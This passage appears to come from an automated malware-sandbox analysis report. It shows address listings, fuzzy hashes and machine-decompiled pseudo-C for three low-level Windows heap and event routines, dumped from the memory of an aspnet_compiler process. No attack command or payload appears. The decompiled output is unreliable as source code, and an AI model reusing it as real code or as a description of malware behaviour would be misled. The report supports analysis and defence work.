                                                  0x0194dd5d
                                                  0x0194dd63
                                                  0x0194dd69
                                                  0x0194dd6e
                                                  0x0194dd71
                                                  0x0194dd78
                                                  0x0194dd7d
                                                  0x0194dd8c
                                                  0x0194dd9e
                                                  0x0194dda0
                                                  0x0194ddad
                                                  0x0194ddb0
                                                  0x0194ddb5
                                                  0x0194ddb9
                                                  0x0194ddd9
                                                  0x0194ddd9
                                                  0x0194ddde
                                                  0x0194dde0
                                                  0x0194dde3
                                                  0x0194dde5
                                                  0x0194dde9
                                                  0x0194dde9
                                                  0x0194ddee
                                                  0x0194ddf6
                                                  0x0194ddf6
                                                  0x0194dd97
                                                  0x00000000
                                                  0x00000000
                                                  0x0194dd9b
                                                  0x00000000
                                                  0x0194dd9b
                                                  0x0194dd7f
                                                  0x00000000
                                                  0x0194dd7f
                                                  0x0194dd3f
                                                  0x0194dd54
                                                  0x0194dd58
                                                  0x0194dd86
                                                  0x00000000
                                                  0x0194dd86
                                                  0x00000000
                                                  0x0194dd5a
                                                  0x0194dd5a
                                                  0x0194dd5a
                                                  0x00000000
                                                  0x0194dd5a
                                                  0x0194dd3f
                                                  0x0194dd38
                                                  0x0194dc12
                                                  0x0194dc15
                                                  0x0194dc25
                                                  0x0194dc31
                                                  0x0194dc34
                                                  0x0194dc3b
                                                  0x0194dc3e
                                                  0x0194dc40
                                                  0x0194dc43
                                                  0x0194dc46
                                                  0x0194dc62
                                                  0x0194dc6b
                                                  0x0194dc6d
                                                  0x0194dc48
                                                  0x0194dc4b
                                                  0x0194dc59
                                                  0x0194dc5c
                                                  0x0194dc5c
                                                  0x0194dc72
                                                  0x0194dc78
                                                  0x0194dc7f
                                                  0x0194dc81
                                                  0x0194dc81
                                                  0x0194dc84
                                                  0x0194dc88
                                                  0x0194dc8d
                                                  0x0194dc95
                                                  0x0194dc9b
                                                  0x0194dca0
                                                  0x0194dca2
                                                  0x0194dca6
                                                  0x0194dca6
                                                  0x0194dcb0
                                                  0x0194dcd1
                                                  0x0194dcd4
                                                  0x0194dcda
                                                  0x0194dcec
                                                  0x0194dcf1
                                                  0x0194dcf6
                                                  0x0194dd0c
                                                  0x0194dd1a
                                                  0x0194dd1a
                                                  0x0194dcf6
                                                  0x00000000
                                                  0x0194dcda
                                                  0x0194dcb5
                                                  0x0194dcb6
                                                  0x0194dcc5
                                                  0x0194dcca
                                                  0x0194dcca

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fcb09324657349dd0ba091fe5d6e83b37bbcd755cbae5117af2dfec566075c6
                                                  • Instruction ID: 8673a09cc6ccb1d22b288db0f03ecdce2d11644c2191aca9f0364c43bb7948fc
                                                  • Opcode Fuzzy Hash: 4fcb09324657349dd0ba091fe5d6e83b37bbcd755cbae5117af2dfec566075c6
                                                  • Instruction Fuzzy Hash: 0E713A79E0012A5FDF14DF99C480DBEBBF5EF98311B054169E999EB384D634C941CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019528EC Relevance: .2, Instructions: 211COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E019528EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E018A2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x1976110; // 0x6860035f
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x1976110; // 0x6860035f
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E019525DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												L0189FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x1976110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E01952506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												L0189FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E018CFA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E0194A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								L0189FFB0(_t115, _t145, _t147);
							}
							_t104 = E01953149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E018A2280(_t104, _t147);
								}
								_v5 = 0xff;
								E01952876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                                                  0x019528f5
                                                  0x019528fa
                                                  0x019528fe
                                                  0x01952900
                                                  0x01952906
                                                  0x01952908
                                                  0x01952908
                                                  0x0195290e
                                                  0x01952915
                                                  0x01952918
                                                  0x0195291b
                                                  0x0195291d
                                                  0x01952920
                                                  0x01952920
                                                  0x01952929
                                                  0x0195292c
                                                  0x0195292f
                                                  0x01952932
                                                  0x01952935
                                                  0x01952938
                                                  0x0195293d
                                                  0x0195293d
                                                  0x01952940
                                                  0x01952944
                                                  0x01952944
                                                  0x01952948
                                                  0x0195294a
                                                  0x01952950
                                                  0x01952953
                                                  0x01952958
                                                  0x00000000
                                                  0x00000000
                                                  0x0195295a
                                                  0x01952962
                                                  0x01952965
                                                  0x01952976
                                                  0x01952978
                                                  0x019529e0
                                                  0x019529e4
                                                  0x019529e6
                                                  0x019529e8
                                                  0x019529eb
                                                  0x01952993
                                                  0x01952993
                                                  0x00000000
                                                  0x01952993
                                                  0x019529ed
                                                  0x019529ef
                                                  0x00000000
                                                  0x00000000
                                                  0x019529f1
                                                  0x00000000
                                                  0x019529f1
                                                  0x0195297a
                                                  0x0195299b
                                                  0x0195299d
                                                  0x019529f5
                                                  0x019529fb
                                                  0x019529fb
                                                  0x01952a00
                                                  0x01952a04
                                                  0x01952a04
                                                  0x01952a06
                                                  0x01952a13
                                                  0x01952a13
                                                  0x01952a18
                                                  0x01952a44
                                                  0x01952a44
                                                  0x01952a44
                                                  0x01952a46
                                                  0x01952a50
                                                  0x01952a5a
                                                  0x01952a5e
                                                  0x01952a99
                                                  0x01952a9e
                                                  0x01952aa0
                                                  0x01952a70
                                                  0x01952a70
                                                  0x01952a72
                                                  0x01952a75
                                                  0x01952a82
                                                  0x01952a89
                                                  0x01952a89
                                                  0x01952a7a
                                                  0x01952a7f
                                                  0x01952a7f
                                                  0x01952a7f
                                                  0x00000000
                                                  0x01952a7f
                                                  0x01952aa4
                                                  0x01952aa4
                                                  0x01952ab6
                                                  0x01952abd
                                                  0x01952ac0
                                                  0x01952ac4
                                                  0x01952ac6
                                                  0x01952ac9
                                                  0x01952acf
                                                  0x01952ad1
                                                  0x01952ad3
                                                  0x01952ad3
                                                  0x01952ad3
                                                  0x01952acf
                                                  0x01952ad6
                                                  0x01952ad9
                                                  0x01952adb
                                                  0x01952add
                                                  0x01952af9
                                                  0x01952af9
                                                  0x01952aff
                                                  0x01952adf
                                                  0x01952adf
                                                  0x01952ae7
                                                  0x01952aea
                                                  0x01952aef
                                                  0x01952af4
                                                  0x01952af4
                                                  0x01952b01
                                                  0x01952b05
                                                  0x01952b08
                                                  0x01952b08
                                                  0x01952b0d
                                                  0x01952b11
                                                  0x01952b1b
                                                  0x01952b20
                                                  0x00000000
                                                  0x01952b11
                                                  0x01952a60
                                                  0x01952a61
                                                  0x01952a6b
                                                  0x00000000
                                                  0x01952a6b
                                                  0x01952a1f
                                                  0x01952a25
                                                  0x01952a25
                                                  0x01952a27
                                                  0x01952a38
                                                  0x01952a3d
                                                  0x01952a3d
                                                  0x01952a3f
                                                  0x01952a3f
                                                  0x00000000
                                                  0x01952a3f
                                                  0x01952a2c
                                                  0x01952a2c
                                                  0x01952a31
                                                  0x00000000
                                                  0x00000000
                                                  0x01952a36
                                                  0x01952a36
                                                  0x00000000
                                                  0x01952a36
                                                  0x01952a0c
                                                  0x00000000
                                                  0x01952a0c
                                                  0x019529a1
                                                  0x019529a4
                                                  0x019529a4
                                                  0x019529b0
                                                  0x019529b5
                                                  0x019529b9
                                                  0x00000000
                                                  0x019529bf
                                                  0x019529c3
                                                  0x019529c6
                                                  0x019529c6
                                                  0x019529cd
                                                  0x019529d3
                                                  0x019529d8
                                                  0x00000000
                                                  0x019529d8
                                                  0x019529b9
                                                  0x01952980
                                                  0x01952983
                                                  0x01952990
                                                  0x00000000
                                                  0x01952989
                                                  0x01952989
                                                  0x0195298c
                                                  0x0195298c
                                                  0x01952995
                                                  0x01952995
                                                  0x01952999
                                                  0x01952999
                                                  0x00000000
                                                  0x01952999

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d98a1b3c2db5ced9d042920c370825b81f58b38f295d036e301c15639698ecc
                                                  • Instruction ID: 48329ecbddc1618aaada08f234598508ec5defa0f0b4e0dbf5475b1218223c16
                                                  • Opcode Fuzzy Hash: 4d98a1b3c2db5ced9d042920c370825b81f58b38f295d036e301c15639698ecc
                                                  • Instruction Fuzzy Hash: E671D431A0010ADBDB69CF6DC990A6EBBF6EF88351F148569DD19E7380DB34DA41C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01906DC9 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E01906DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L018A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01906B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = L018A7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E018C9AE0();
					_t87 = L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0190795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0190795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0190795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0190795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L018A4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01906B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01906B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01906B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01906B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(L018A7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E018C9AE0();
								L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L018A2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L018A2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L018A2400( &_v52);
							}
							if(_v28 >= 0) {
								return L018A2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                  0x01906dd4
                                                  0x01906dde
                                                  0x01906de1
                                                  0x01906de3
                                                  0x01906de6
                                                  0x01906de9
                                                  0x01906dec
                                                  0x01906def
                                                  0x01906df2
                                                  0x01906df5
                                                  0x01906dfe
                                                  0x01906e04
                                                  0x01906e09
                                                  0x01906e0d
                                                  0x01906e18
                                                  0x01906e1b
                                                  0x01906e22
                                                  0x01906e2d
                                                  0x01906e30
                                                  0x01906e36
                                                  0x01906e42
                                                  0x01906e4d
                                                  0x01906e50
                                                  0x01906e55
                                                  0x01906e5c
                                                  0x01906e6e
                                                  0x01906e5e
                                                  0x01906e67
                                                  0x01906e67
                                                  0x01906e73
                                                  0x01906e74
                                                  0x01906e77
                                                  0x01906e7c
                                                  0x01906e7d
                                                  0x01906e8e
                                                  0x01906e93
                                                  0x01906e9c
                                                  0x01906ea8
                                                  0x01906eab
                                                  0x01906eac
                                                  0x01906eb3
                                                  0x01906ecd
                                                  0x01906edc
                                                  0x01906ee2
                                                  0x01906ee5
                                                  0x01906ef2
                                                  0x01906efb
                                                  0x01906f01
                                                  0x01906f06
                                                  0x01906f0b
                                                  0x01906f11
                                                  0x01906f1a
                                                  0x01906f22
                                                  0x01906f26
                                                  0x01906f26
                                                  0x01906f33
                                                  0x01906f41
                                                  0x01906f44
                                                  0x01906f47
                                                  0x01906f54
                                                  0x01906f65
                                                  0x01906f77
                                                  0x01906f7c
                                                  0x01906f82
                                                  0x01906f91
                                                  0x01906f99
                                                  0x01906fa3
                                                  0x01906fae
                                                  0x01906fae
                                                  0x01906fba
                                                  0x01906fbb
                                                  0x01906fbc
                                                  0x01906fc1
                                                  0x01906fc2
                                                  0x01906fd3
                                                  0x01906fd8
                                                  0x01906fd8
                                                  0x01906fdf
                                                  0x01906fe8
                                                  0x01906fee
                                                  0x01906fee
                                                  0x01906ff5
                                                  0x01906ffb
                                                  0x01906ffb
                                                  0x01907004
                                                  0x00000000
                                                  0x0190700a
                                                  0x01907004
                                                  0x01906eb3
                                                  0x01906e9c
                                                  0x01907015

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction ID: c9259a4c116313cd2511c2cc5c83ba28657db9b16e375121a2b5f833a2bea6ea
                                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction Fuzzy Hash: 07716071E0060AEFDB15DFA9C984AEEBBB9FF48710F104169E509E7290D734EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0191B8D0 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E0191B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1977b9c; // 0x0
				_t124 = L018A4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E018C9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E018C95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E018C95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L018A77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E018C9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E018C95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1977b9c; // 0x0
									_t92 = L018A4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E018C9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = L0188A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = L0191E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = L0191E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E018C95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                  0x0191b8d9
                                                  0x0191b8e4
                                                  0x00000000
                                                  0x0191b8e6
                                                  0x0191b8f3
                                                  0x0191b8f5
                                                  0x0191b8f5
                                                  0x0191b8f8
                                                  0x0191b920
                                                  0x0191b924
                                                  0x0191b936
                                                  0x0191b939
                                                  0x0191b93d
                                                  0x0191b948
                                                  0x0191b9a0
                                                  0x0191b9a0
                                                  0x0191b9a4
                                                  0x0191b9bf
                                                  0x0191b9c4
                                                  0x0191b9c6
                                                  0x0191b9cd
                                                  0x0191b9d1
                                                  0x0191bad4
                                                  0x0191bad8
                                                  0x0191bada
                                                  0x0191badc
                                                  0x0191badc
                                                  0x0191badf
                                                  0x0191bae0
                                                  0x0191bae2
                                                  0x0191bae4
                                                  0x0191baec
                                                  0x0191baee
                                                  0x0191baf0
                                                  0x0191baf0
                                                  0x0191baec
                                                  0x0191bafb
                                                  0x0191bafc
                                                  0x0191bafe
                                                  0x0191bb01
                                                  0x0191bb01
                                                  0x00000000
                                                  0x0191bb06
                                                  0x0191b9d7
                                                  0x0191b9db
                                                  0x0191b9db
                                                  0x0191b9de
                                                  0x0191b9de
                                                  0x0191b9e4
                                                  0x0191b9e7
                                                  0x0191b9ea
                                                  0x0191b9ec
                                                  0x0191b9ef
                                                  0x0191b9f3
                                                  0x0191ba1b
                                                  0x0191ba1b
                                                  0x0191ba23
                                                  0x0191ba24
                                                  0x0191ba27
                                                  0x0191ba2a
                                                  0x0191ba2b
                                                  0x0191ba2e
                                                  0x0191ba30
                                                  0x0191ba37
                                                  0x0191ba3f
                                                  0x0191ba9c
                                                  0x0191baa2
                                                  0x0191bb13
                                                  0x0191bb15
                                                  0x0191baae
                                                  0x0191baae
                                                  0x0191bab3
                                                  0x0191bab5
                                                  0x0191baba
                                                  0x0191bac8
                                                  0x0191bac8
                                                  0x0191baba
                                                  0x0191bacd
                                                  0x0191bacf
                                                  0x00000000
                                                  0x0191bacf
                                                  0x0191bb1a
                                                  0x00000000
                                                  0x0191bb1c
                                                  0x0191baa7
                                                  0x0191bb11
                                                  0x00000000
                                                  0x0191bb11
                                                  0x0191baa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0191ba41
                                                  0x0191ba41
                                                  0x0191ba41
                                                  0x0191ba58
                                                  0x0191ba5d
                                                  0x0191ba62
                                                  0x00000000
                                                  0x00000000
                                                  0x0191ba64
                                                  0x0191ba67
                                                  0x0191ba68
                                                  0x0191ba69
                                                  0x0191ba6c
                                                  0x0191ba6f
                                                  0x0191ba71
                                                  0x0191ba78
                                                  0x0191ba80
                                                  0x00000000
                                                  0x00000000
                                                  0x0191ba90
                                                  0x0191ba90
                                                  0x0191ba97
                                                  0x00000000
                                                  0x0191ba97
                                                  0x0191b9f5
                                                  0x0191b9f7
                                                  0x0191b9f7
                                                  0x0191b9fa
                                                  0x0191ba03
                                                  0x0191ba07
                                                  0x0191ba0c
                                                  0x0191ba10
                                                  0x0191ba17
                                                  0x00000000
                                                  0x0191b9f7
                                                  0x0191b9a6
                                                  0x0191b9a8
                                                  0x0191b9af
                                                  0x0191b9b3
                                                  0x00000000
                                                  0x00000000
                                                  0x0191b9b9
                                                  0x00000000
                                                  0x0191b9b9
                                                  0x0191b94d
                                                  0x0191b98f
                                                  0x0191b995
                                                  0x0191b999
                                                  0x0191b960
                                                  0x0191b967
                                                  0x0191b968
                                                  0x0191b96a
                                                  0x00000000
                                                  0x0191b96a
                                                  0x0191b99b
                                                  0x0191b99e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0191b99e
                                                  0x0191b951
                                                  0x0191b954
                                                  0x0191b95a
                                                  0x0191b95e
